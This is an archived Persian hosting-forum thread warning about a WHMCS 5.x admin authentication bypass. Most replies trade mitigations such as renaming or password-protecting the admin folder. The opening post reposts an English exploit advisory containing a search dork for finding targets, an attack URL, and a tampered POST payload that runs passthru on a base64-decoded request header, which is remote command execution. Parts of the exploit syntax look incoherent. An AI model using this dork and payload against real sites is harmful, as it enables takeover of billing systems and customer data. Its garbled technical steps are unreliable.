مهم »»» مشکل امنیتی جدید با درجه اهمیت بالا در WHMCS ورژن 5.x [بایگانی]

PDA

توجه ! این یک نسخه آرشیو شده میباشد و در این حالت شما عکسی را مشاهده نمیکنید برای مشاهده کامل متن و عکسها بر روی لینک مقابل کلیک کنید : مهم »»» مشکل امنیتی جدید با درجه اهمیت بالا در WHMCS ورژن 5.x

secure_host

January 5th, 2013, 01:07

با سلام
مشکل امنیتی جدیدی در WHCS ورژن 5 وجود دارد که باعث می شود شخص نفوذگر به صفحه ادمین دسترسی پیدا کند.

راه کار : تا ارایه Patch از ناحیه WHMCS می توانید قابلیت cache-security را در WHMCS خود فعال نمایید . گفتنی است که امکان cache-security به صورت پیش فرض بر روی whmcs 5.1 فعال می باشد.
اطلاعات تکمیلی :
WHMCS 5.x Authentication Bypass - CXSecurity WLB (http://cxsecurity.com/issue/WLB-2013010026)

WHMCS 5.x versions suffers from a cookie-validation vulnerability, where sessions can be modified and authentication can
be easily bypassed.

##################################################
# Description : WHMCS 5.x Authentication Bypass Vulnerability
# Author : Agd_Scorp
# Contact: vorscorp@hotmail.com
# Version : 5.x
# Link : Order Now - WHMCS (http://www.whmcs.com/order-now/)
# Date : Monday, December 31, 2012
# Dork : intext:Powered by WHMCompleteSolution
##################################################

Recommended: You must have BEeF or Tamper Data already installed, I do not recommend doing this process manually.

# The Fact:

WHMCS
5.0 is completely vulnerable to this vulenrability, but in 5.1 version,
WHMCS has added extra cache-security, so I've added an extra-payload
for it, you can do the exploitation-process without the payload in the
5.0 version.

# The Exploitation

http://site.com/whmcs/admin/login.php?correct&cache=1?login=getpost{}

after
you have successfully entered that into your browser, the page will lag
for abit due to the cache-validation, which we, ofcourse, will change
it. ;-)

when the page is loading, quickly open Tamper Data and change the loading POST_SESSION request & the payload to
this:

POST: $post(login=1);passthru(base64_decode(\$_SERVER[HTTP_CMD]))&login_cancel;die;";

Payload: $payload = "login=1&title=1&execorder=0&hook=urlencoded&redirect={admin_index}";

# The Result

Once
you have done this process, you will be automatically be redirected to
the admin page, although, if the administrator has enabled
cache-security, this process will fail.

# Solution & Fix

No solution & fix, just wait for the WHMCS team to release a patch for this vulnerability.

i-whost

January 5th, 2013, 01:10

تشکر ولی چرا ایمیلی ارسال نشده؟

kambizmabdi

January 5th, 2013, 01:15

سلام
بهترین کار اینه که هم با پنل پوشه ادمین رو روش رمز بزاریم و اسم پوشه هم عوض کنیم.با تشکر

Ashkankamangar.ir

January 5th, 2013, 01:16

سلام عذر میخوام با توجه به نوع بایپس آیا در صورت تغیییر نام پوشه ی ادمین و گذاشتن رمز بر روی پوشه ی ادمین باز این خطر وجود دارد؟

CityKala.net

January 5th, 2013, 01:22

سلام عذر میخوام با توجه به نوع بایپس آیا در صورت تغیییر نام پوشه ی ادمین و گذاشتن رمز بر روی پوشه ی ادمین باز این خطر وجود دارد؟

با سلام
فکر نمیکنم احتمالا روی پوشه اجرا میکنند!
اما باز هم یک باز دیگه اسم رو عوض کنید! و رمز جدید بذارید
کار از محکم کاری عیب نمیکند!
ما که تحویل اتوماتیک هم کلا نسلش رو ورداشتیم!

secure_host

January 5th, 2013, 01:23

تشکر ولی چرا ایمیلی ارسال نشده؟
باید من پاسخ گو باشم ؟

سلام عذر میخوام با توجه به نوع بایپس آیا در صورت تغیییر نام پوشه ی ادمین و گذاشتن رمز بر روی پوشه ی ادمین باز این خطر وجود دارد؟

سلام .خیر

Reza.exe

January 5th, 2013, 01:25

سلام
نوع نفوذ بایپس کردن کوکی و فرستادن هدر های جعلی به سرور هست که اگر شخص آدرس لوگین یا یوزر پسورد فولدر ادمین را داشته باشه می تونه نفوذ کنه

shivahost

January 5th, 2013, 01:32

روی نسخه های 4 چطور؟

RoobinaServer

January 5th, 2013, 01:43

سلام عذر میخوام با توجه به نوع بایپس آیا در صورت تغیییر نام پوشه ی ادمین و گذاشتن رمز بر روی پوشه ی ادمین باز این خطر وجود دارد؟

سلام

اشکان عزیز من چند بار تست کردم رمز که بگذارید به مشکل میخوره بعضی قسمت های سیستم فروش همان فقط نام پوشه را عوض کنید.(سیستم آنلاین و ...)

ارادتمند سجادیه
یا حق

websazha

January 5th, 2013, 02:28

سلام
سطح دست رسی پورشه ادمین ما مدتی هست 000 می کنیم نظر جناب رحیمیان در این باب اگر امکان دارند.

om!d-D

January 5th, 2013, 04:41

روی فولدر ادمین با پسورد گذاری نباید عمل کنه ولی با تغییر نام ایا ای اتفاق میفته ؟

راه کار : تا ارایه Patch از ناحیه WHMCS می توانید قابلیت cache-security را در WHMCS خود فعال نمایید .
cache sec کجا هست ؟ پیداش نکردم :)

shivahost

January 5th, 2013, 09:36

سلام

اشکان عزیز من چند بار تست کردم رمز که بگذارید به مشکل میخوره بعضی قسمت های سیستم فروش همان فقط نام پوشه را عوض کنید.

ارادتمند سجادیه
یا حق

بیش از یکسال هست رمز گذاشتیم و هیچ مشکلی ندیدم....

CityKala.net

January 5th, 2013, 10:49

سلام
سطح دست رسی پورشه ادمین ما مدتی هست 000 می کنیم نظر جناب رحیمیان در این باب اگر امکان دارند.

می بخشید چجوری تیکت جواب میدید شما؟

Ashkankamangar.ir

January 5th, 2013, 11:41

سلام

اشکان عزیز من چند بار تست کردم رمز که بگذارید به مشکل میخوره بعضی قسمت های سیستم فروش همان فقط نام پوشه را عوض کنید.(سیستم آنلاین و ...)

ارادتمند سجادیه
یا حق

سلام ادمین من الان دو ساله رمز داره و مشکلی نداره تغییر نام هم همین طور

RoobinaServer

January 5th, 2013, 11:52

بیش از یکسال هست رمز گذاشتیم و هیچ مشکلی ندیدم....

سلام ادمین من الان دو ساله رمز داره و مشکلی نداره تغییر نام هم همین طور

بله انشالله که مشکل نخورید سیستم ما که مشکل میخوره (بر اساس ماژول ها و کانفیگی که داریم به پوشه ادمین نیاز داره) و موارد امنیتی دیگری قرار دادیم

یا حق

websazha

January 8th, 2013, 20:44

می بخشید چجوری تیکت جواب میدید شما؟

هر زمان تیکت جواب بخواد با یه حرکت سطح دست رسی رو 755 می کنیم بعد پاسخ باز 000.